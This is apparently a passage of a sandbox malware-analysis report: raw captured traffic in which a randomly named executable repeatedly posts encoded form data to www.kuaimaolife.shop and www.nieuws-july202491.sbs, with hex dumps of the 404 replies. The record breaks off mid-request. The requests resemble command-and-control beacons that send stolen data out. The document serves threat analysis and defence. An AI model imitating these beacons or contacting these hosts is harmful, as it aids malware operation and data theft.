                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.65003738.55.251.233801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:15.245714903 CEST1809OUTPOST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 57 4e 6b 4d 41 59 62 53 49 75 56 58 59 59 68 78 69 41 74 74 72 64 46 68 2f 43 75 33 69 4c 73 47 42 6b 59 42 37 48 74 4b 4f 6c 5a 4c 33 51 52 46 4f 4e 63 64 50 63 33 6f 4d 71 47 50 7a 47 41 56 63 73 35 42 56 70 34 4a 32 31 77 56 45 43 64 6f 4f 53 2f 41 34 57 6f 77 77 33 69 4f 59 6e 6e 72 4f 38 38 7a 71 77 4d 71 6f 65 2b 43 79 36 32 79 4f 44 44 57 6d 48 6d 2f 4d 48 59 58 50 4a 4f 63 71 6b 45 31 2f 68 31 63 5a 58 46 48 46 2b 72 78 50 56 4e 46 70 37 4a 44 42 2f 6f 66 37 42 37 6e 52 43 35 79 76 38 4f 53 54 54 48 75 48 62 2f 2b 58 46 42 4a 32 78 32 68 61 59 6d 4e 41 71 48 58 53 58 43 4d 41 2f 43 4d 61 35 31 2b 66 42 50 34 54 6f 74 71 63 6d 77 65 4a 64 67 44 64 44 31 43 51 45 7a 32 4f 66 31 78 6c 67 55 6d 46 68 72 78 74 6b 2f 49 56 6c 54 47 47 36 43 35 43 52 4a 6d 50 52 41 6e 68 68 58 6f 34 69 30 79 4c 4f 47 7a 6b 51 43 42 4e 77 4f 51 79 76 43 73 52 69 79 2b 43 69 39 44 77 50 75 4c 69 70 32 55 39 2f 4d 41 77 7a 5a 32 33 68 47 50 4d 68 4d 55 4b 6c 78 44 57 47 72 56 63 64 30 7a 32 65 31 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=0WNkMAYbSIuVXYYhxiAttrdFh/Cu3iLsGBkYB7HtKOlZL3QRFONcdPc3oMqGPzGAVcs5BVp4J21wVECdoOS/A4Woww3iOYnnrO88zqwMqoe+Cy62yODDWmHm/MHYXPJOcqkE1/h1cZXFHF+rxPVNFp7JDB/of7B7nRC5yv8OSTTHuHb/+XFBJ2x2haYmNAqHXSXCMA/CMa51+fBP4TotqcmweJdgDdD1CQEz2Of1xlgUmFhrxtk/IVlTGG6C5CRJmPRAnhhXo4i0yLOGzkQCBNwOQyvCsRiy+Ci9DwPuLip2U9/MAwzZ23hGPMhMUKlxDWGrVcd0z2e1ZVTuaFF0Sy6bUPdh3tKQMLTX0VMhVrIBECtUkBP5FnFCreZb0fW7oBD+zZQ/w45EZxXiPivuzDQEr1Xsvp4MLFmcMc05+veckOmhzeWoHJktNAaeodU/aCLbVM0CTPut9Cm/39oCWRJI/EQOPG6RlDMT/FcAhoBpQjB23qwu7cSqVaf/oqFNO82YIgJR8ExVdUdi8Y259uB6jL2JeYdcmG8+4Rp77fEbrZ5SEMAheSYLirEcO90GsVEbwqe0FjgHOph+amo+rCZ1py1hxiuX9ED96n2yRGyK6onJI6+/hOT0GljaP2ZOs38ocKF6cHHs6wxHtTPJbzq8fkhAPHpgz1TmVMN1VDx/tCLSVF+TP/+iCq0opX5HN+6SQXmQyJrn/jlEhMCoh3aGys124OEam4PsvOkVLEbWpQ78MlpnNamHBqqCFis85nvPvcxz+y0AS+Z8HP5HWKqzpI3wYLldXsJvFebH+2+bC9oDQuyztwbtSlB+UVNDp1P333045GO+su00vCpOFHFDW5uizNIeUCX3t1aFtl4fSGGufAZTtLTxuGUu0ltuyQ0vocS/YZ3FICS0RmOsPHo5zzGDnwZ3swUsJ+Y3S5aDEtoZShsSrzxG9BjSfyP0uQSxzoQG0JZM8vwcNGa0fVzDlwpph6qymmvaLJHiZ/kF5U [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:36:16.072273970 CEST691INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:15 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              44192.168.2.65003838.55.251.233801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:17.787180901 CEST508OUTGET /9wb2/?ej6Le=5UlEP0kDVMW/PPEwoDc70sMozoicrCD3NhlqEuGPGOUFJHosOZBhD6Eku4DzDmeGf+gBdkEGC1Jne06x+N2lRr6ZxBLzarbPmMoZ56wq7frcAS7q07bHFFW9m+jVLfRUYpA8+/U=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:36:18.630810022 CEST691INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:18 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              45192.168.2.650040162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:23.694304943 CEST787OUTPOST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 6b 6b 2f 6b 6f 4c 65 77 6f 4a 6f 4a 39 63 37 65 35 55 6e 32 76 65 43 4b 47 61 33 42 37 4a 72 54 4d 33 4c 78 6a 6e 75 42 71 74 2b 69 61 58 53 74 52 2f 71 33 65 48 4e 4f 5a 73 44 6e 38 33 58 41 4f 49 44 6a 51 32 37 4f 35 6a 35 76 67 2b 30 73 4c 53 46 49 6e 51 44 75 6b 6c 6c 45 78 76 53 62 37 70 55 2f 6a 63 51 79 72 33 76 50 74 39 33 51 44 73 43 31 4d 52 52 73 64 33 43 52 36 32 30 52 5a 41 45 53 6c 6b 38 53 56 6a 77 38 6d 4b 38 48 71 35 70 33 4e 39 6b 55 33 41 58 7a 38 61 65 34 74 70 56 5a 68 75 64 6c 4a 31 48 6e 72 51 71 7a 69 74 47 79 4f 79 44 59 4e 33 6d 61 70 6f 49 4d 72 45 5a 4d 78 30 41 70 62 70 53 43
                                                                                                                              Data Ascii: ej6Le=kk/koLewoJoJ9c7e5Un2veCKGa3B7JrTM3LxjnuBqt+iaXStR/q3eHNOZsDn83XAOIDjQ27O5j5vg+0sLSFInQDukllExvSb7pU/jcQyr3vPt93QDsC1MRRsd3CR620RZAESlk8SVjw8mK8Hq5p3N9kU3AXz8ae4tpVZhudlJ1HnrQqzitGyOyDYN3mapoIMrEZMx0ApbpSC
                                                                                                                              Oct 7, 2024 12:36:24.285926104 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:24 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 135AZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                                                              Oct 7, 2024 12:36:24.285974979 CEST1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                                                              Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                                                              Oct 7, 2024 12:36:24.286021948 CEST1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                                                              Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                                                              Oct 7, 2024 12:36:24.286058903 CEST1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                                                              Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                                                              Oct 7, 2024 12:36:24.286091089 CEST287INData Raw: d7 31 cf 2e f7 76 e1 7c 37 80 7f 42 fe 4a a8 eb 2b e6 4f 64 b9 66 ff 53 e0 7e 06 aa 3f bd a0 ea cf 9f 6a e3 22 f0 7b 5b 5e ef f8 3c fc 47 1a 03 ea 7c a7 84 67 55 dd 7d 7b 84 3f 5b f5 08 7f 64 9e 1b 40 7d c0 d7 55 84 78 65 f1 f1 b9 b2 f7 5e e1 bf
                                                                                                                              Data Ascii: 1.v|7BJ+OdfS~?j"{[^<G|gU}{?[d@}Uxe^WWt=@fo2}zn_DV'3$O}(MGfB%'M}Sg$>~/1~0g`u|~t!w378x^h t4


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              46192.168.2.650041162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:26.234390974 CEST811OUTPOST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 6b 6b 2f 6b 6f 4c 65 77 6f 4a 6f 4a 79 64 4c 65 2f 46 6e 32 75 2b 43 4a 59 4b 33 42 77 70 72 50 4d 77 44 78 6a 6c 43 6f 71 65 61 69 61 31 4b 74 66 65 71 33 66 48 4e 4f 58 4d 44 69 32 58 57 74 4f 49 66 4e 51 33 48 4f 35 6a 74 76 67 38 73 73 49 6a 46 48 6f 67 44 67 34 6c 6c 47 31 76 53 62 37 70 55 2f 6a 63 73 59 72 33 6e 50 73 4d 48 51 43 4e 43 32 4b 68 52 76 61 33 43 52 2b 32 30 64 5a 41 46 48 6c 68 64 50 56 67 59 38 6d 50 59 48 71 49 70 32 58 74 6b 61 7a 41 57 66 7a 5a 37 63 68 71 63 74 6d 50 70 6c 58 6d 66 65 6e 47 72 70 2b 65 47 52 63 69 6a 61 4e 31 2b 6f 70 49 49 6d 70 45 68 4d 6a 6a 4d 4f 55 64 33 68 51 38 32 58 73 44 6e 76 6f 51 67 6c 61 37 65 46 34 55 66 6c 42 41 3d 3d
                                                                                                                              Data Ascii: ej6Le=kk/koLewoJoJydLe/Fn2u+CJYK3BwprPMwDxjlCoqeaia1Ktfeq3fHNOXMDi2XWtOIfNQ3HO5jtvg8ssIjFHogDg4llG1vSb7pU/jcsYr3nPsMHQCNC2KhRva3CR+20dZAFHlhdPVgY8mPYHqIp2XtkazAWfzZ7chqctmPplXmfenGrp+eGRcijaN1+opIImpEhMjjMOUd3hQ82XsDnvoQgla7eF4UflBA==
                                                                                                                              Oct 7, 2024 12:36:26.837969065 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:26 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 22 44 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee a9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 135BZJvL"DMUhqCV's=pB<w?qKvm( o=|3q+{XV)w]vtOv,"fv?B0GV]nyyG=56jZ:UMh/0K'wRUX7!rV&Y:s*^o/^VL?{f]m7n*/L-B/?.+0@{?{T`+QJ`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_^WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*KoJ^^i[5w\;+~RB7z8G{eOy-/as^ho^19_G5m{Z^b1/Vz 2xc7+w7;<[^G;\,ml[z7/hK901[3~{Yr@K~y?@q/I:d9oj0}^/5FP:{}>Lnn!AOl^:?Ww'
                                                                                                                              Oct 7, 2024 12:36:26.838063002 CEST1236INData Raw: 4a e0 6f 66 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 08 a4 2f 86 19 91 54 de fd f9 66 9b 5b d4 de 0c f7 ca cb b3 f2 92 a1 1e 06 85 1b 83 58 d7 dc 38 60 3f a7 8f 58 c0 7f da 87 41 10 3a 8e 9b be b1 d4 8f f6 ed 2a 3f 5d 90 fd ec d7 ef e7 bd b1 df af b8 65
                                                                                                                              Data Ascii: JofxoO/Tf[X8`?XA:*?]e,O?FH{?zvGY?U)g:$?*d4^}oa'CH?x!g9iY\W8a*~+z`U$
                                                                                                                              Oct 7, 2024 12:36:26.838089943 CEST1236INData Raw: b8 2c f1 f1 02 16 8d 36 5c 76 9a e0 bb fc dc 4e 2c 49 1c db b6 a0 b1 4e a7 bb 86 99 4e 72 75 26 31 3a 27 4e ba 16 b5 83 59 c8 d0 59 12 9d f1 8e c0 63 28 ad b7 d3 64 1b 44 6a 89 98 a4 31 32 84 8d 3b 1a 61 09 5a ed 63 9d e1 83 b9 38 8e c8 b4 5e f0
                                                                                                                              Data Ascii: ,6\vN,INNru&1:'NYYc(dDj12;aZc8^uoV<._!i2MF#lyvNs\se,}T]lZ<qM#1;j8cni5HOp$s)jf\XK~Ht93-bJwjE8D^x)sBF^X^nCeST jF
                                                                                                                              Oct 7, 2024 12:36:26.838109016 CEST1236INData Raw: 6d 08 e0 d4 0a d3 b4 e7 e3 32 ae d7 4d c0 31 1b 06 33 09 f1 d4 c1 84 de 2d 8a 8e f2 b3 93 bd 45 74 de 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 4d 16 fb 88 c6 99 bc c1 d3 83 b7 82 d3 40 1b 51 28 08 cd 32 59 11 4b 77 db a9 5d 1d a5 7e 3d 43 57 14
                                                                                                                              Data Ascii: m2M13-Et_'lw"L4M@Q(2YKw]~=CWAkJLvOp&"cgY-;t6tPJCgGehwYe;F.<lz8,~D24w9J-s38&+/vBy@NL6%iT-LLi$
                                                                                                                              Oct 7, 2024 12:36:26.838124037 CEST288INData Raw: e0 75 cc b3 cb bd 5d 38 df 0d e0 9f 90 bf 12 ea fa 8a f9 13 59 ae d9 ff 14 b8 9f 81 ea 4f 2f a8 fa f3 a7 da b8 08 fc de 96 d7 3b 3e 0f ff 91 c6 80 3a df 29 e1 59 55 77 df 1e e1 cf 56 3d c2 1f 99 e7 06 50 1f f0 75 15 21 5e 59 7c 7c ae ec bd 57 f8
                                                                                                                              Data Ascii: u]8YO/;>:)YUwV=Pu!^Y||W/]0q_*v /3?SJs&(>Ppx<c$IO@LLYn~l 3=a:{.}c@)%>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.650042162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:28.782408953 CEST1824OUTPOST /rq5n/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202491.sbs
